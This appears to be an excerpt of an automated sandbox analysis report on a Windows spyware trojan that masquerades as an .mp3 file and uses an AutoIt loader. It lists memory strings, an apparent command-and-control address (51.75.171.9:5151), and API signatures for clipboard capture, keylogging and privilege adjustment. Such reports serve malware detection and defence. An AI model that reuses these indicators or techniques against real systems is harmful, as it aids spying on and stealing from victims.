                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003ED7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,7_2_003ED7A1
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2078930988.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2216834063.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000000.2185326660.0000000000E65000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: OpenWith.exe, 0000000F.00000002.2944848789.000000000327C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8
                Source: OpenWith.exe, 0000000F.00000002.2944848789.000000000327C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8(
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003EF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,7_2_003EF45C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003EF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_003EF6C7
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E0F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00E0F6C7
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003EF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,7_2_003EF45C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003DA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,7_2_003DA54A
                Source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_7d31fd25-6
                Source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_98c403a2-e
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00409ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_00409ED5
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E29ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00E29ED5
                Source: Yara matchFile source: 15.3.OpenWith.exe.59c0000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.3.OpenWith.exe.57a0000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: OpenWith.exe PID: 7980, type: MEMORYSTR

                System Summary

                barindex
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_066CA41B GetCurrentProcess,NtQueryInformationProcess,17_2_066CA41B
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_066C7895 NtQueryInformationProcess,17_2_066C7895
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B09B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00B09B5C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003D1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,7_2_003D1A91
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003DF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,7_2_003DF122
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DFF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_00DFF122
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B1355D0_2_00B1355D
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B1B76F0_2_00B1B76F
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B0BF3D0_2_00B0BF3D
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B2C0D60_2_00B2C0D6
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B1A0080_2_00B1A008
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B292D00_2_00B292D0
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B1A2220_2_00B1A222
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B152140_2_00B15214
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B1C27F0_2_00B1C27F
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B343600_2_00B34360
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B386D20_2_00B386D2
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B146CF0_2_00B146CF
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B048AA0_2_00B048AA
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B3480E0_2_00B3480E
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B05AFE0_2_00B05AFE
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B1ABC80_2_00B1ABC8
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B07CBA0_2_00B07CBA
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B1BC050_2_00B1BC05
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B03D9D0_2_00B03D9D
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B14D320_2_00B14D32
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B2BEA70_2_00B2BEA7
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B05F390_2_00B05F39
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B15F0B0_2_00B15F0B
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003980377_2_00398037
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003920077_2_00392007
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_0038E0BE7_2_0038E0BE
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_0037E1A07_2_0037E1A0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_0037225D7_2_0037225D
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003AA28E7_2_003AA28E
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003922C27_2_003922C2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_0038C59E7_2_0038C59E
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003FC7A37_2_003FC7A3
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003AE89F7_2_003AE89F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003E291A7_2_003E291A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003A6AFB7_2_003A6AFB
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003D8B277_2_003D8B27
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_0039CE307_2_0039CE30
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003A71697_2_003A7169
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_004051D27_2_004051D2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003792407_2_00379240
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003794997_2_00379499
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003917247_2_00391724
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00391A967_2_00391A96
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00379B607_2_00379B60
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00397BAB7_2_00397BAB
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00391D407_2_00391D40
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00397DDA7_2_00397DDA
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_0135825014_2_01358250
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_0135515814_2_01355158
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_0135514814_2_01355148
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_0135824014_2_01358240
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_01357F2C14_2_01357F2C
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A4841915_2_05A48419
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A5FC7D15_2_05A5FC7D
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A4871F15_2_05A4871F
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A5C77615_2_05A5C776
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A5BE5A15_2_05A5BE5A
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A5C1DA15_2_05A5C1DA
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A5E83315_2_05A5E833
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A5781515_2_05A57815
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A57BA215_2_05A57BA2
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A5BBAF15_2_05A5BBAF
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A5234015_2_05A52340
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DAE0BE16_2_00DAE0BE
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB200716_2_00DB2007
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB803716_2_00DB8037
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00D9E1A016_2_00D9E1A0
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB22C216_2_00DB22C2
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DCA28E16_2_00DCA28E
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00D9225D16_2_00D9225D
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DAC59E16_2_00DAC59E
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E1C7A316_2_00E1C7A3
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DCE89F16_2_00DCE89F
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E0291A16_2_00E0291A
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DC6AFB16_2_00DC6AFB
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DF8B2716_2_00DF8B27
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DBCE3016_2_00DBCE30
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E251D216_2_00E251D2
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DC716916_2_00DC7169
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00D9924016_2_00D99240
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00D9949916_2_00D99499
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB172416_2_00DB1724
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB1A9616_2_00DB1A96
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB7BAB16_2_00DB7BAB
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00D99B6016_2_00D99B60
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB7DDA16_2_00DB7DDA
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB1D4016_2_00DB1D40
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_01BF825017_2_01BF8250
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_01BF515817_2_01BF5158
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_01BF514817_2_01BF5148
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_01BF824017_2_01BF8240
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_066C3E3D17_2_066C3E3D
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_066C7E1D17_2_066C7E1D
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_06A62E2017_2_06A62E20
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_066C9BC417_2_066C9BC4
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_066D1B8C17_2_066D1B8C
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_066D1C2217_2_066D1C22
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_066C300017_2_066C3000
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: String function: 00390DC0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: String function: 0038FD60 appears 31 times
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: String function: 00DAFD60 appears 31 times
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: String function: 00DB0DC0 appears 46 times
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: String function: 00B257D8 appears 66 times
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: String function: 00B26630 appears 31 times
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: String function: 00B257A5 appears 34 times
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs ngPebbPhbp.exe
                Source: ngPebbPhbp.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@31/48@0/1
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B0932C GetLastError,FormatMessageW,_wcslen,LocalFree,0_2_00B0932C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003D194F AdjustTokenPrivileges,CloseHandle,7_2_003D194F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003D1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,7_2_003D1F53
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DF194F AdjustTokenPrivileges,CloseHandle,16_2_00DF194F
